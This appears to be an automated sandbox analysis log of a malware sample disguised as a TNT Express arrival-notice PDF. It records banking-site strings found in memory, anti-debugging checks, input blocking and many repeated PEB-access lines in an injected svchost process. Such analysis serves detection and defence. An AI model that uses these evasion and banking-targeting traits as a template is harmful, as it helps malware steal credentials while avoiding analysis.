Source: 6D395-7-.4.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: 6D395-7-.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: 6D395-7-.4.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0327096E rdtsc

2_2_0327096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_004178D3 LdrLoadDll,

2_2_004178D3

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Code function: 0_2_0093EAA2 BlockInput,

0_2_0093EAA2

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Code function: 0_2_008F2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_008F2622

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Code function: 0_2_008C42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_008C42DE

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_008E4CE8 mov eax, dword ptr fs:[00000030h]	0_2_008E4CE8
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_008B34D0 mov eax, dword ptr fs:[00000030h]	0_2_008B34D0
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_008B3530 mov eax, dword ptr fs:[00000030h]	0_2_008B3530
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_008B1E70 mov eax, dword ptr fs:[00000030h]	0_2_008B1E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]	2_2_0326A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]	2_2_0326A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]	2_2_0326A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C310 mov ecx, dword ptr fs:[00000030h]	2_2_0322C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03250310 mov ecx, dword ptr fs:[00000030h]	2_2_03250310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D437C mov eax, dword ptr fs:[00000030h]	2_2_032D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov ecx, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FA352 mov eax, dword ptr fs:[00000030h]	2_2_032FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D8350 mov ecx, dword ptr fs:[00000030h]	2_2_032D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]	2_2_0322E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]	2_2_0322E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]	2_2_0322E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325438F mov eax, dword ptr fs:[00000030h]	2_2_0325438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325438F mov eax, dword ptr fs:[00000030h]	2_2_0325438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]	2_2_03228397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]	2_2_03228397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]	2_2_03228397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032663FF mov eax, dword ptr fs:[00000030h]	2_2_032663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EC3CD mov eax, dword ptr fs:[00000030h]	2_2_032EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]	2_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]	2_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]	2_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]	2_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B63C0 mov eax, dword ptr fs:[00000030h]	2_2_032B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]	2_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]	2_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]	2_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D43D4 mov eax, dword ptr fs:[00000030h]	2_2_032D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D43D4 mov eax, dword ptr fs:[00000030h]	2_2_032D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322823B mov eax, dword ptr fs:[00000030h]	2_2_0322823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]	2_2_03234260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]	2_2_03234260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]	2_2_03234260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322826B mov eax, dword ptr fs:[00000030h]	2_2_0322826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B8243 mov eax, dword ptr fs:[00000030h]	2_2_032B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B8243 mov ecx, dword ptr fs:[00000030h]	2_2_032B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A250 mov eax, dword ptr fs:[00000030h]	2_2_0322A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236259 mov eax, dword ptr fs:[00000030h]	2_2_03236259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EA250 mov eax, dword ptr fs:[00000030h]	2_2_032EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EA250 mov eax, dword ptr fs:[00000030h]	2_2_032EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402A0 mov eax, dword ptr fs:[00000030h]	2_2_032402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402A0 mov eax, dword ptr fs:[00000030h]	2_2_032402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h]	2_2_0326E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h]	2_2_0326E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]	2_2_032B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]	2_2_032B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]	2_2_032B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]	2_2_032402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]	2_2_032402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]	2_2_032402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03260124 mov eax, dword ptr fs:[00000030h]	2_2_03260124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DA118 mov ecx, dword ptr fs:[00000030h]	2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]	2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]	2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]	2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F0115 mov eax, dword ptr fs:[00000030h]	2_2_032F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]	2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]	2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C4144 mov ecx, dword ptr fs:[00000030h]	2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]	2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]	2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C156 mov eax, dword ptr fs:[00000030h]	2_2_0322C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C8158 mov eax, dword ptr fs:[00000030h]	2_2_032C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236154 mov eax, dword ptr fs:[00000030h]	2_2_03236154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236154 mov eax, dword ptr fs:[00000030h]	2_2_03236154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03270185 mov eax, dword ptr fs:[00000030h]	2_2_03270185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h]	2_2_032EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h]	2_2_032EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h]	2_2_032D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h]	2_2_032D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]	2_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]	2_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]	2_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]	2_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]	2_2_0322A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]	2_2_0322A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]	2_2_0322A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033061E5 mov eax, dword ptr fs:[00000030h]	2_2_033061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032601F8 mov eax, dword ptr fs:[00000030h]	2_2_032601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h]	2_2_032F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h]	2_2_032F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A020 mov eax, dword ptr fs:[00000030h]	2_2_0322A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C020 mov eax, dword ptr fs:[00000030h]	2_2_0322C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6030 mov eax, dword ptr fs:[00000030h]	2_2_032C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B4000 mov ecx, dword ptr fs:[00000030h]	2_2_032B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]	2_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]	2_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]	2_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]	2_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325C073 mov eax, dword ptr fs:[00000030h]	2_2_0325C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03232050 mov eax, dword ptr fs:[00000030h]	2_2_03232050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6050 mov eax, dword ptr fs:[00000030h]	2_2_032B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C80A8 mov eax, dword ptr fs:[00000030h]	2_2_032C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F60B8 mov eax, dword ptr fs:[00000030h]	2_2_032F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_032F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323208A mov eax, dword ptr fs:[00000030h]	2_2_0323208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0322A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032380E9 mov eax, dword ptr fs:[00000030h]	2_2_032380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B60E0 mov eax, dword ptr fs:[00000030h]	2_2_032B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0322C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032720F0 mov ecx, dword ptr fs:[00000030h]	2_2_032720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B20DE mov eax, dword ptr fs:[00000030h]	2_2_032B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h]	2_2_0326C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h]	2_2_0326C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326273C mov eax, dword ptr fs:[00000030h]	2_2_0326273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326273C mov ecx, dword ptr fs:[00000030h]	2_2_0326273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326273C mov eax, dword ptr fs:[00000030h]	2_2_0326273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AC730 mov eax, dword ptr fs:[00000030h]	2_2_032AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C700 mov eax, dword ptr fs:[00000030h]	2_2_0326C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230710 mov eax, dword ptr fs:[00000030h]	2_2_03230710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03260710 mov eax, dword ptr fs:[00000030h]	2_2_03260710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238770 mov eax, dword ptr fs:[00000030h]	2_2_03238770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
